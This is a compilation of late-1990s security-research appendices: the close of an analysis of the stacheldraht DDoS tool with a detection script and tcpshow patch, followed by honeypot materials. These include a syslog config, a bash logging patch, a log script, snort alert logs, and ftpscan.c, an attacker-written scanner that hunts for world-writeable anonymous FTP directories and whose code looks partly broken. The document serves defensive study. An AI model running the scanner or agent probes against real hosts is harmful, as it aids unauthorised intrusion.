      Since stacheldraht uses ICMP_ECHOREPLY packets for some of its
      functioning, and those TCP connections that it uses employ Blowfish
      encryption of the data stream, it will be difficult to detect
      stacheldraht in action, and the ICMP_ECHOREPLY packets will go right
      through most firewalls.  Programs like "ngrep" do not process ICMP
      packets, so you will not as easily (at this point in time) be able to
      watch for strings in the data portion of the ICMP packets (except
      using the patches to tcpshow from Appendix C and patches to
      sniffit provided in the analysis of TFN).
      
      Stacheldraht does not authenticate the source of ICMP packets,
      and also does not encrypt strings embedded in ICMP packets.
      
      If the command values have not been changed from the default,
      as few as just one packet would be necessary to flush out an
      agent.  Either:
      
        a). send an ICMP_ECHOREPLY packet with an ID field value of 668 and
            watch for an ICMP_ECHOREPLY packet to come back with an ID field
            value of 669 and the string "sicken\n" in the data field, or
      
        b). send an ICMP_ECHOREPLY packet with a source address of
            "3.3.3.3" (and ID value of 666 and data field with "skillz"
            if you want to go all out) and watch for an ICMP_ECHOREPLY
            packet to come back with an ID field value of 1000 and the
            string "spoofworks" in the data field.
      
      (A Perl script using Net::RawIP named "gag" has been developed to
      accomplish the former.  See Appendix A).
      
      
      The next logical evolutionary steps
      -----------------------------------
      
      When I first started analyzing trinoo source code back in early
      October, and after having observed TFN binaries in action just after
      that, it was obvious to me that encryption of communication channels
      and more automated maintenance of large networks was in active
      development.  Discussions with others at the CERT workshop in November
      brought out many other new feature ideas that I'm sure the underground
      is also thinking of.
      
      Having now seen the stacheldraht code, and that of yet another
      unreleased distributed denial of service attack tool (for a total of
      four different handler/agent distributed DoS tools found "in the
      wild" this year), the assumptions about the evolution of these tools
      appear to have been correct, even if the code remains a bit unfinished
      and with a few bugs (e.g., installations witnessed as late as December
      20 continue to include cron entries that re-start the agent every
      minute!)
      
      I can't wait to see what the New Year will bring. ;) :(  ??  @#$%^&*!!!
      
      --
      David Dittrich <dittrich@cac.washington.edu>
      http://staff.washington.edu/dittrich/
      
      
      
      Appendix A - Perl script "gag" to detect stacheldraht agents
      ------------------------------------------------------------
      
      -------------------------------  cut here  -----------------------------------
      #!/usr/bin/perl
      #
      # gag v. 1.0
      # By Dave Dittrich <dittrich@cac.washington.edu>
      #
      # Send an ICMP_ECHOREPLY packet with ID of 668 to a stacheldraht
      # agent, causing it to reply to the sending host with an
      # ICMP_ECHOREPLY packet with an ID of 669 and the string "sicken\n"
      # in the data field of the packet.  Watch for this with tcpdump,
      # sniffit, etc., e.g.:
      #
      #       # tcpdump -s 1500 -w stach.dump 'icmp[4:2] = 669'
      #       # tcpshow < stach.dump
      #
      # Needs Net::RawIP (http://quake.skif.net/RawIP)
      # Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z)
      #
      # Example: ./gag [options] host1 [host2 [...]]
      #
      # (This code was hacked from the "macof" program, written by
      # Ian Vitek <ian.vitek@infosec.se>)
      
      require 'getopts.pl';
      use Net::RawIP;
      require 'netinet/in.ph';
      
      $a = new Net::RawIP({icmp => {}});
      chop($hostname = `hostname`);
      
      Getopts('a:c:f:i:vh');
      die "usage: $0 [options] iplist\
      \t-a arg\t\tSend command argument 'arg' (default \"gesundheit!\")\
      \t-c val\t\tSend command value 'val' (default 668 - ID_TEST)\
      \t-f from_host\t\t(default:$hostname)\
      \t-i interface \t\tSet sending interface (default:eth0)\
      \t-v\t\t\tVerbose\
      \t-h This help\n" unless ( !$opt_h );
      
      # set default values
      $opt_i = ($opt_i) ? $opt_i : "eth0";
      $opt_a = ($opt_a) ? $opt_a : "gesundheit!";
      $opt_c = ($opt_c) ? $opt_c : "668";
      
      # choose network card
      if($opt_e) {
        $a->ethnew($opt_i, dest => $opt_e);
      } else {
        $a->ethnew($opt_i);
      }
      
      $s_host = ($opt_h) ? $opt_h : $hostname;
      
      if ($ARGV[0]) {
        open(I,"<$ARGV[0]") || die "could not open file: '$ARGV[0]'";
        while (<I>) {
          chop;
          push(@list,$_);
        }
        close(I);
      }
      
      # Put value in network byte order (couldn't get htons() in
      # "netinet/in.ph" to work. Go figure.)
      $id = unpack("S", pack("n", $opt_c));
      
      foreach $d_host (@list) {
        $a->set({ip => {saddr => $s_host, daddr => $d_host},
                 icmp => {type => 0, id => $id, data => $opt_a}
                });
        print "sending packet [$opt_c/\"$opt_a\"] to $d_host\n" if $opt_v;
        $a->send;
      }
      
      exit(0);
      -------------------------------  cut here  -----------------------------------
      
      
      Appendix B - References
      -----------------------
      
      TCP/IP Illustrated, Vol. I, II, and III. W. Richard Stevens and Gary
      R. Wright., Addison-Wesley.
      
      The DoS Project's "trinoo" distributed denial of service attack tool
              http://staff.washington.edu/dittrich/misc/trinoo.analysis
      
      The "Tribe Flood Network" distributed denial of service attack tool
              http://staff.washington.edu/dittrich/misc/tfn.analysis
      
      CERT Distributed System Intruder Tools Workshop report
              http://www.cert.org/reports/dsit_workshop.pdf
      
      CERT Advisory CA-99-17 Denial-of-Service Tools
              http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html
      
      Distributed denial of service attack tools at Packet Storm Security
              http://packetstorm.securify.com/distributed/
      
      tcpdump:
              ftp://ftp.ee.lbl.gov/tcpdump.tar.Z
      
      tcpshow:
              http://packetstorm.securify.com/linux/trinux/src/tcpshow.c
      
      sniffit:
              http://sniffit.rug.ac.be/sniffit/sniffit.html
      
      Net::RawIP:
              http://quake.skif.net/RawIP
      
      loki client/server:
              Phrack Magazine, Volume Seven, Issue Forty-Nine,
              File 06 of 16, [ Project Loki ]
              http://www.phrack.com/search.phtml?view&article=p49-6
      
              Phrack Magazine  Volume 7, Issue 51 September 01, 1997,
              article 06 of 17 [ L O K I 2   (the implementation) ]
              http://www.phrack.com/search.phtml?view&article=p51-6
      
      libnet:
              http://www.packetfactory.net/libnet
      ----------------------------------------------------------------------------
      
      
      Appendix C: Patches to tcpshow 1.0 to display ICMP ECHO id/seq
      ----------------------------------------------------------------------
      diff -c tcpshow/tcpshow.c tcpshow.orig/tcpshow.c
      *** tcpshow/tcpshow.c   Mon Dec 27 16:21:54 1999
      --- tcpshow.orig/tcpshow.c      Thu Oct 21 14:12:19 1999
      ***************
      *** 1081,1088 ****
           uint2 nskipped;
           uint1 type;
           char *why;
      -    uint2 echo_id;
      -    uint2 echo_seq;
      
      
           type = getbyte(&pkt);  nskipped  = sizeof(type);
      --- 1081,1086 ----
      ***************
      *** 1093,1103 ****
           /* Must calculate it from the size of the IP datagram - the IP header.   */
           datalen -= ICMPHDRLEN;
      
      -    if (type == ECHO_REQ || type == ECHO_REPLY) {
      -       echo_id = getword(&pkt); nskipped += sizeof(cksum);
      -       echo_seq = getword(&pkt); nskipped += sizeof(cksum);
      -    }
      -
           why = icmpcode(type, code);
           if (dataflag) {
              printf(
      --- 1091,1096 ----
      ***************
      *** 1120,1129 ****
               icmptype(type), why? "\n\tBecause:\t\t\t": "", why? why: ""
              );
              printf("\tChecksum:\t\t\t0x%04X\n", cksum);
      -       if (type == ECHO_REQ || type == ECHO_REPLY) {
      -          printf("\tId:\t\t\t\t0x%04X (%d)\n", echo_id, echo_id);
      -          printf("\tSequence:\t\t\t0x%04X (%d)\n", ntohs(echo_seq), ntohs(echo_seq));
      -       }
           }
      
           return pkt;
      --- 1113,1118 ----
      ***************
      *** 1194,1200 ****
              printf("\tVersion:\t\t\t4\n\tHeader Length:\t\t\t%d bytes\n", hlen);
              printf("\tService Type:\t\t\t0x%02X\n", (uint2)servtype);
              printf("\tDatagram Length:\t\t%d bytes\n", dgramlen);
      !       printf("\tIdentification:\t\t\t0x%04X (%d)\n", id, id);
              printf(
               "\tFlags:\t\t\t\tMF=%s DF=%s\n",
               (flags & MF) == MF? on: off, (flags & DF) == DF? on_e: off_e
      --- 1183,1189 ----
              printf("\tVersion:\t\t\t4\n\tHeader Length:\t\t\t%d bytes\n", hlen);
              printf("\tService Type:\t\t\t0x%02X\n", (uint2)servtype);
              printf("\tDatagram Length:\t\t%d bytes\n", dgramlen);
      !       printf("\tIdentification:\t\t\t0x%04X\n", id);
              printf(
               "\tFlags:\t\t\t\tMF=%s DF=%s\n",
               (flags & MF) == MF? on: off, (flags & DF) == DF? on_e: off_e
      ----------------------------------------------------------------------
      
      --
      Dave Dittrich                 Client Services
      dittrich@cac.washington.edu   Computing & Communications
                                    University of Washington
      
      <a href="http://www.washington.edu/People/dad/">
      Dave Dittrich / dittrich@cac.washington.edu [PGP Key]</a>
      
      PGP 6.5.1 key fingerprint:
      FE 97 0C 57 08 43 F3 EB  49 A1 0C D0 8E 0C D0 BE  C8 38 CC B5
      
      EoF   
      
      Serverlog example Know your enemy #2
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      *.*                                                     @192.168.41.15
      
      # Log all kernel messages to the console.
      # Logging much else clutters up the screen.
      #kern.*                                                 /dev/console
      
      # Log anything (except mail) of level info or higher.
      #Don't log private authentication messages!
      *.info;mail.none;authpriv.none                          /var/log/messages
      
      # The authpriv file has restricted access.
      authpriv.*                                              /var/log/secure
      
      # Log all the mail messages in one place.
      mail.*                                                  /var/log/maillog
      
      # Log  all ssh1 traffic
      local1.info                                             /var/log/sshdlog
      
      # Everybody gets emergency messages, plus log them on another
      # machine.
      *.emerg                                                 *
      
      # Save mail and news errors of level err and higher in a
      # special file.
      uucp,news.crit                                          /var/log/spooler
      
      
      EoF
         
      
      ftp-scan.c Know your enemy #2
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      /* 
       * ftpscan 1.o - by vENOMOUS of rdC - Mar 29, 1999
       *
       * This will open a specific file [-f file], get the IPs from it,
       * then, check if FTP port [ -p 21 ] is open and log  the  version.
       * If you specify the [ -o ] flag  it will try log into the FTP
       * and execute LIST command [recursive], this is usefull 
       * for see if there are any world writeable directories.
       *
       * You should know what you can do with that.
       *
       * credits: localip (lip) routine has been taken from queSO.
       *
       * Greets: ka0z [!thanks for the help, ideas and advices buddy!] - meengo
       *         #rdC - ub
       *
      */
      
      #include <stdio.h>
      #include <string.h>
      #include <netdb.h>
      #include <netinet/in.h>
      #include <sys/socket.h>
      #include <sys/types.h>
      #include <sys/time.h>
      #include <unistd.h>
      #include <errno.h>
      #include <time.h>
      #include <signal.h>
      #include "blah.h"    /* taken from queSO */
      
      char rdcopenfile(char g0d[257]);
      void usage(char *damn);
      void RDCconnect2(char host[1000], int puerto);
      int bindit(int socket_type, u_short port, int *listener); 
      void sigh(int z);
      u_long lip(void); /* QueSO */
      
      FILE *file;
      FILE *fileout;
      
      char ipsfile[256],
           bleh[100000][200],
           homer[256],
           beer[256],
           huhense[32];
      
      u_long localip; 
      
      int sockfd,
          leen2=0,
          listing=0,
          sockfd1,
          ip1=0, 
          ip2=0, 
          ip3=0, 
          ip4=0, 
          lsock=-1,
          port2=-1,
          lala=0,
          dfinder=0,
          gotit=0,
          xx=0;
       
      int main(int argc, char **argv)
      {
      char arg;
      
      int  p0rt=21;
      
              if ( argc < 3 ) 
              { 
              usage(argv[0]); 
              }
              
              while ((arg = getopt(argc, argv, "f:p:o")) != EOF)
              {
                      switch(arg)
                      {
                              case 'f':
                                 strncpy(ipsfile,optarg,128);
                                 break;
                              case 'p':
                                 p0rt = atoi (optarg);
                                 break;
                              case 'o':
                                 listing = 1;
                                 break;
                              default:
                                 usage(argv[0]);
                              break;
      
                      }
              }
              while (dfinder < 5)
                      {
                         char disp[500];
                              sprintf(disp,"ppp%d",dfinder);
                              strcpy(huhense,disp);
                              localip = lip();
                              sscanf((char *) inet_ntoa(localip),"%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);
                              if ((ip3 && ip4) != 0)
                                      {
                                              gotit=1;
                                              break;
                                      }
                              dfinder++;
                      }
      
              dfinder=0;
              if (gotit == 1)
                      dfinder=6;
              while (dfinder < 5)
                      {
                         char disp[500];
                              sprintf(disp,"eth%d",dfinder);
                              strcpy(huhense,disp);
                              localip = lip();
                              sscanf((char *) inet_ntoa(localip),"%d.%d.%d.%d", &ip1, &ip2, &ip3,&ip4);
                              if ((ip3 && ip4) != 0)
                                      {
                                              gotit=1;
                                              break;
                                      }
                              dfinder++;
                      }
      
              if (gotit == 0)
              {
                      fprintf(stdout,"\nCannot define local ip address, aborting!\n\n");
                      fflush(stdout);
                      exit(1);
              }
      
              fprintf(stdout,"Local IP is %s\nStarting Scan...  \n\n",inet_ntoa(localip));
              fflush(stdout);
      
              sprintf(beer,"PORT %d,%d,%d,%d,69,%d\nLIST -lR\n", ip1, ip2, ip3 ,ip4, 222 + lala);
              strlen(beer);
      
              rdcopenfile(ipsfile);
              for (xx = 0 ; xx < leen2 ; xx++)
                      {
                              RDCconnect2(bleh[xx], p0rt);
                              lala++;
                      }
      }
      
      char rdcopenfile(char g0d[257])
      {
      int x;
      
               /* see if the file can be read... */
              if ((file=fopen(g0d,"r")) == NULL) 
              {
                      printf("\nftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99\n");
                      printf("\nCannot open file %s for reading\n\n", g0d);
                      exit(1);
              }
              /* get the all the lines */
              for ( ; fgets(bleh[leen2], 190, file) != NULL ; leen2++);
              fclose(file);
      }
      
      
      void RDCconnect2(char host[1000], int puerto)
      {
      char versi0n[5000];
      int nmb;
              struct sockaddr_in beb;
              struct hostent *d0h;
      //      struct timeval timev; 
              beb.sin_family = AF_INET;
              beb.sin_port = htons(puerto);
              d0h = gethostbyname(host);
              if (!d0h) 
              {
                      if ( (beb.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) 
                              {
                                      printf("\nftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99\n");
                                      printf("\nPut a correct address\n\n");
                                      exit(0);
                              }
              } else
                      {
                                 bcopy( d0h->h_addr, (struct in_addr *) &beb.sin_addr, d0h->h_length);
                      }
      
              strcpy(homer,"unable to connect: Connection refused");
              sockfd = socket(AF_INET, SOCK_STREAM,0);
              fprintf(stdout,"\n------------------------------------------------------------------------------n");
              fprintf(stdout,"IP: %s", host);
              fflush(stdout);
              signal(SIGALRM, sigh);
              alarm(10); 
              if(connect(sockfd, (struct sockaddr *)&beb, sizeof(struct sockaddr)) < 0)
                      {
                              fprintf(stdout,"%s\n\n",homer);
                              fflush(stdout);
                              return;
      
                      }
              alarm(0);
              bzero(versi0n, sizeof(versi0n));
              if ((nmb = recv(sockfd, versi0n, 5000, 0)) == -1)
                      {
                              fprintf(stdout,"Connection reset by peer?\n\n");
                              fflush(stdout);
                      } 
              if (strlen(versi0n) == 0)
                      {
                              close(sockfd);
                              return;
                      }
              if (strstr(versi0n,"Microsoft") != NULL)
                      {
                              fprintf(stdout,"Skipping host, cuz its runing wind0ze\n\n");
                              fflush(stdout);
                              close(sockfd);
                              return;
                      }
              if (strstr(versi0n,"WinSock") != NULL)
                      {
                              fprintf(stdout,"Skipping host, cuz its runing wind0ze\n\n");
                              fflush(stdout);
                              close(sockfd);
                              return;
                      }
              if (strstr(versi0n,"NetWare") != NULL)
                      {
                              fprintf(stdout,"Skipping host cuz its runing NetWare\n\n");
                              fflush(stdout);
                              close(sockfd);
                              return;
                      }
              if (strstr(versi0n,"Proxy Server") != NULL)
                      {
                              fprintf(stdout,"Runing ProxyServer, skipping host\n\n");
                              fflush(stdout);
                              close(sockfd);
                              return;
                      }
      
              fprintf(stdout,"FTP banner:\n");
              fprintf(stdout,"%s\n",versi0n); 
              fflush(stdout);
              if (listing == 1)
                      {
                         char username[70],
                              sendear[17200],
                              listit[100];
                              
                              int n;
      
                              /* login in */
                              strcpy(username,"anonymous");
                              sprintf(sendear,"USER %s\n",username);
                              fprintf(stdout,"Login as: %s\n",username);
                              write(sockfd,sendear,strlen(sendear));
                              read(sockfd,sendear,sizeof(sendear));
                              if (strstr(sendear,"denied") != NULL)
                              {
                                      fprintf(stdout,"Anonymous access denied, skipping\n\n");
                                      close(sockfd);
                                      return;
                              }
                              if (strstr(sendear,"USER anonymous") != NULL)
                              {
                                      fprintf(stdout,"Remote host has closed the connection.\n\n");
                                      close(sockfd);
                                      return;
                              }
                              if (strstr(sendear,"unknown") != NULL)
                              {
                                      fprintf(stdout,"Anonymous access unknown\n\n");
                                      close(sockfd);
                                      return;
                              }
                              if (strstr(sendear,"not found") != NULL)
                              {
                                      fprintf(stdout,"User anonymous not found\n\n");
                                      close(sockfd);
                                      return;
                              }
                              fprintf(stdout,"Answer: %s\n",sendear);
                              bzero(sendear, sizeof(sendear));
                              fprintf(stdout,"Using password: bleh@\n");
                              write(sockfd,"PASS bleh@\n",11);
                              read(sockfd,sendear,sizeof(sendear));
                              if (strstr(sendear,"Can't set") != NULL)
                              {
                                      fprintf(stdout,"Cant set guest privileges\n\n");
                                      close(sockfd);
                                      return;
                              }
                              fprintf(stdout,"Answer: %s\n",sendear);
                              bzero(sendear, sizeof(sendear));
                              fprintf(stdout,"Setting PORT to %d\n",17886+lala);
                              bzero(beer,sizeof(beer));
                              sprintf(beer,"PORT %d,%d,%d,%d,69,%d\nLIST -lR\n",ip1, ip2, ip3 ,ip4, 222 + lala);
                              write(sockfd,beer,strlen(beer) + 4);
                              read(sockfd,beer,sizeof(beer)); 
                              /* bind the port for data transfer */
                              sockfd1 = bindit(SOCK_STREAM, port2, &lsock);
                              read(sockfd,sendear,sizeof(sendear)); 
                              fprintf(stdout,"Using LIST command\n");
                              fprintf(stdout,"Answer: %s\n",sendear); 
                              bzero(sendear, sizeof(sendear));  
                              read(sockfd1,sendear,sizeof(sendear));
                              fprintf(stdout,"Recursive list:\n %s\n",sendear);
                              bzero(sendear, sizeof(sendear));
                              fflush(stdout);
                      //      lala++;
                    } 
              close(sockfd);
              close(sockfd1);
      }
              
      int bindit(int socket_type, u_short port, int *listener)
      {
      struct sockaddr_in address;
      int listening_socket;
      int connected_socket = -1;
      int reuse_addr = 1;
      char sendear[17200];
      
              port = htons(17886+lala);
              memset((char *) &address, 0, sizeof(address));
              address.sin_family = AF_INET;
              address.sin_port = port;
              address.sin_addr.s_addr = htonl(INADDR_ANY);
      
              listening_socket = socket(AF_INET, socket_type, 0);
              if (listening_socket < 0) 
              {
                      fprintf(stdout,"Cant recive list.\n\n");
                      fflush(stdout);
                      return;
              }
      
              if (listener != NULL)
                      *listener = listening_socket;
      
              setsockopt(listening_socket, SOL_SOCKET, SO_REUSEADDR, &reuse_addr, sizeof(reuse_addr));
      
              if (bind(listening_socket, (struct sockaddr *) &address, sizeof(address)) < 0) 
              {
                      fprintf(stdout,"Error\n\n");
                      fflush(stdout);
                      close(listening_socket);
                      exit(1);
              }
              
              listen(listening_socket, 1);
              signal(SIGALRM, sigh);
              alarm(10);
              
              while(connected_socket < 0) 
              {
                      connected_socket = accept(listening_socket, NULL, NULL); 
              }
      }
      
      void sigh(int z)
      {
              alarm(0);
              signal(SIGALRM, SIG_DFL);
              strcpy(homer,"Unable to connect: timeout");
      }
      
      
      u_long lip (void)
      {
        int pvto,
            yesto,
            traversal;
        struct sockaddr_in *dim0n;
        struct ifreq *i;
        struct ifconf ic;
        char bufercito[512];
      
        pvto = socket (AF_INET, SOCK_STREAM, 0);
        ic.ifc_pum = 512;
        ic.ifc_buf = bufercito;
        ioctl (pvto, SIOCGIFCONF, (char *) &ic);
        i = ic.ifc_req;
        yesto = (ic.ifc_pum / sizeof(struct ifreq));
        for (traversal = 0; traversal < yesto; traversal++) {
      
            ioctl(pvto, SIOCGIFADDR, (char *) &i);
            dim0n = (struct sockaddr_in *) &i->ifr_ifru.ifru_addr;
            if (!strcmp (i->ifr_name, huhense))
            return dim0n->sin_addr.s_addr;
            i++;
            }
      }
      
      void usage(char *damn)
      {
      printf("\n<[(  ftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99 )]>");
      printf("<[(  usage:\n");
      printf("<[(        %s -f file [-p port] [-o]\n\n",damn);
      printf("<[( -f file: file is the IPs file.\n");
      printf("<[( -p port: port to connect to, default 21.\n");
      printf("<[(      -o: with this flag, ftpscan will log into the FTPserver\n");
      printf("<[(          as anonymous, and do a recursive list.\n\n");
      exit(0);
      }
      
      EoF
      
      Scripts from Know your enemy #2
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      From ant@notatla.demon.co.uk Tue May  2 13:26:38 2000
      Date: Sun, 23 Apr 2000 20:35:11 +0100
      From: Antonomasia <ant@notatla.demon.co.uk>
      To: lance@spitzner.net
      Subject: bash history logging
      
      Lance,
      
      In the bash-2.03 package of RH6.2 this mod will add history logging.
      It is done in the lib/readline/history.c file, concerned with recording
      commands rather than reading keystrokes, but the effect is almost the
      same.  One thing this doesn't record is when someone repeats the last
      command because that does not generate a new history record.
      
      Just 2 things need to be added: an include of the syslog.h file
      and a syslog(3) call with the new history entry.  I've split the
      syslog(3) section into 2 to cater for long and short lines separately
      because some syslog()s are/have been buggy.
      
           1  /* History.c -- standalone history library */
           2  
           3  /* Copyright (C) 1989, 1992 Free Software Foundation, Inc.
      
          32  #include <stdio.h>
      +   33  #include <syslog.h>
      
      
         217  /* Place STRING at the end of the history list.  The data field
         218     is  set to NULL. */
         219  void
         220  add_history (string)
         221       char *string;
         222  {
         223    HIST_ENTRY *temp;
         224  
      +  225    if (strlen(string)<60) {
      +  226        syslog(LOG_INFO, "BASH2 HISTORY: PID=%d %s", getpid(), string);
      +  227    } else {
      +  228        char trunc[60];
      +  229  
      +  230        strncpy(trunc,string,sizeof(trunc));
      +  231        trunc[sizeof(trunc)-1]='\0';
      +  232        syslog(LOG_INFO, "BASH2 HISTORY: PID=%d %s(++TRUNC)",
      +  233                          getpid(), trunc);
      +  234    }
         235  
         236    if (history_stifled && (history_length == max_input_history))
         237      {
         238        register int i;
      
      --
      ##############################################################
      # Antonomasia   ant@notatla.demon.co.uk                      #
      # See http://www.notatla.demon.co.uk/                        #
      ##############################################################
      
      
      EoF
      
      korn shell:
      ~~~~~~~~~~
      #!/bin/ksh
      #
      # Created 20 April, 1999
      # Lance Spitzner, lance@spitzner.net
      #
      # Shows last 10 entries of critical system logs.
      # Build in some "artificial intelligence" using
      # greps and sorts.  You can select a specific
      # hosts logs, or you can select all hosts logs.
      #
      
      ##### Define input
      if [ "$1" = "all" ]; then
              system=":"
      else
              system=$1
      fi
      
      log=$2
      
      ##### Define logs
      inetdlog=/var/adm/inetdlog
      messages=/var/adm/messages
      syslog=/var/adm/syslog
      
      ##### Functions
      inetdlog () {
      echo  "\n\t--- Last 10 entries in $inetdlog ---\n"
      grep "$system" "$inetdlog" | grep -v "172.16.1." | tail -10
      }
      
      messages () {
      echo  "\n\t--- Last 10 entries in $messages ---\n"
      grep "$system" "$messages" | egrep -v '(named|MARK)' | tail -10
      }
      
      syslog () {
      echo  "\n\t--- Last 10 entries in $syslog ---\n"
      grep "$system" "$syslog" | tail -10
      }
      
      title () {
      if [ "$system" = ":" ]; then
              echo  "\n### These are the log results of all systems ###"
      else
              echo  "\n### These are the log results of system $system ###"
      fi
      }
      
      ##### Actual program
      case $log in
              inetdlog)
              title
              inetdlog
              ;;
              messages)
              title
              messages
              ;;
              syslog)
              title
              syslog
              ;;
              all)
              title
              inetdlog
              messages
              syslog
              ;;
              *)
              echo  "\nUsage: `basename $0` <host> <log>"
              echo
              echo "\t<host> "
              echo "\tCan either be a single source you want to grep"
              echo "\tfor in the log, or type \"all\" for all hosts in the" 
              echo "\tlog file."
              echo
              echo "\t<log>"
              echo "\tinetdlog  -> for /var/log/inetdlog"
              echo "\tmessages  -> for /var/log/messages"
              echo "\tsyslog    -> for /var/log/syslog"
              echo "\tall       -> for all three log files\n"
      ;;
      esac
      
      exit 0
      
      
      honeypot activity logs : Know your enemy #3 : Forensics
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      #
      # All the probes my network received in a sinlge month.
      # Starting 15 April, 2000
      #
      # You can lookup the IDS number signatures at
      # Max Vision's ArachNIDs database at 
      # http://www.whitehats.com
      #
      # Signatures captured using snort
      # http://www.snort.org
      #
      
      Apr 15 13:40:41 mozart snort[7002]: IDS212/dns-zone-transfer: 207.239.115.11:2307 -> 172.16.1.101:53
      Apr 16 02:45:37 mozart snort[7483]: IDS13/portmap-request-mountd: 200.190.13.181:1372 -> 172.16.1.107:111
      Apr 16 07:17:06 mozart snort[7483]: IDS128/web-cgi-phf: 200.190.8.220:55220 -> 172.16.1.107:80
      Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.101
      Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.105
      Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.107
      Apr 17 06:02:32 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.101:111
      Apr 17 06:02:32 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.107:111
      Apr 17 09:45:28 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.105:111
      Apr 19 08:00:19 mozart snort[3515]: IDS/DNS-version-query: 212.25.75.196:1723 -> 172.16.1.101:53
      Apr 20 01:26:00 mozart snort[3515]: IDS212/dns-zone-transfer: 24.234.45.60:4075 -> 172.16.1.107:53
      Apr 20 03:49:38 mozart snort[3515]: IDS/DNS-version-query: 216.123.23.5:4349 -> 172.16.1.101:53
      Apr 20 03:49:39 mozart snort[3515]: IDS/DNS-version-query: 216.123.23.5:4350 -> 172.16.1.107:53
      Apr 20 21:48:55 mozart snort[12353]: IDS246/large-icmp: 129.142.224.3 -> 172.16.1.107
      Apr 20 21:48:55 mozart snort[12353]: IDS246/large-icmp: 129.142.224.3 -> 172.16.1.107
      Apr 20 22:46:57 mozart snort[12632]: IDS/RPC-rpcinfo-query: 207.239.115.11:3619 -> 172.16.1.107:111
      Apr 20 22:48:13 mozart snort[12632]: IDS159/Ping Microsoft Windows: 216.228.4.204 -> 172.16.1.101
      Apr 20 22:46:57 mozart snort[12632]: IDS/RPC-rpcinfo-query: 207.239.115.11:3619 -> 172.16.1.107:111
      Apr 20 22:48:13 mozart snort[12632]: IDS159/Ping Microsoft Windows: 216.228.4.204 -> 172.16.1.101
      Apr 20 23:00:33 mozart snort[12657]: IDS171/Ping zeros: 216.228.4.133 -> 172.16.1.101
      Apr 21 11:01:27 mozart snort[12777]: IDS/DNS-version-query: 207.236.55.76:4039 -> 172.16.1.101:53
      Apr 21 11:01:28 mozart snort[12777]: IDS/DNS-version-query: 207.236.55.76:4044 -> 172.16.1.107:53
      Apr 22 08:36:29 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:1368 -> 172.16.1.101:53
      Apr 22 08:36:29 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:1328 -> 172.16.1.107:53
      Apr 22 10:00:23 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:4401 -> 172.16.1.101:53
      Apr 22 10:00:23 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:4369 -> 172.16.1.107:53
      Apr 22 11:31:58 mozart snort[743]: IDS/RPC-rpcinfo-query: 213.1.152.141:728 -> 172.16.1.101:111
      Apr 23 01:33:51 mozart snort[3919]: IDS128/web-cgi-phf: 12.68.183.51:4310 -> 172.16.1.107:80
      Apr 23 01:33:56 mozart snort[3919]: IDS218/web-cgi-test-cgi: 12.68.183.51:4312 -> 172.16.1.107:80
      Apr 23 01:34:01 mozart snort[3919]: IDS235/web-cgi-handler: 12.68.183.51:4314 -> 172.16.1.107:80
      Apr 23 01:34:20 mozart snort[3919]: IDS219/web-cgi-perl-exe: 12.68.183.51:4321 -> 172.16.1.107:80
      Apr 23 01:34:36 mozart snort[3919]: IDS224/web-cgi-nph-test-cgi: 12.68.183.51:4328 -> 172.16.1.107:80
      Apr 23 21:01:18 mozart snort[3919]: spp_portscan: PORTSCAN DETECTED from 210.178.9.125
      Apr 23 21:01:25 mozart snort[3919]: IDS/RPC-rpcinfo-query: 210.178.9.125:850 -> 172.16.1.101:111
      Apr 24 07:09:47 mozart snort[4663]: IDS212/dns-zone-transfer: 210.145.109.162:12540 -> 172.16.1.107:53
      Apr 24 09:23:01 mozart snort[4663]: IDS7/SourcePortTraffic-53-tcp: 202.42.233.186:53 -> 172.16.1.107:111
      Apr 24 09:23:01 mozart snort[4663]: IDS7/SourcePortTraffic-53-tcp: 202.42.233.186:53 -> 172.16.1.101:111
      Apr 24 09:23:05 mozart snort[4663]: IDS/RPC-rpcinfo-query: 202.42.233.186:637 -> 172.16.1.107:111
      Apr 24 09:23:10 mozart snort[4663]: IDS/RPC-rpcinfo-query: 202.42.233.186:638 -> 172.16.1.101:111
      Apr 24 14:36:55 mozart snort[4663]: IDS162/Ping Nmap 2.36BETA: 194.222.156.169 -> 172.16.1.105
      Apr 24 14:43:35 mozart snort[4663]: IDS162/Ping Nmap 2.36BETA: 194.222.156.169 -> 172.16.1.101
      Apr 24 14:46:46 mozart snort[4663]: spp_portscan: PORTSCAN DETECTED from 194.222.156.169
      Apr 24 14:46:46 mozart snort[4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
      Apr 24 17:59:51 mozart snort[4663]: IDS/DNS-version-query: 212.244.97.121:2891 -> 172.16.1.101:53
      Apr 24 18:01:05 mozart snort[4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
      Apr 24 19:04:01 mozart snort[4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
      Apr 25 02:08:07 mozart snort[5875]: IDS/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
      Apr 25 02:08:07 mozart snort[5875]: IDS/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
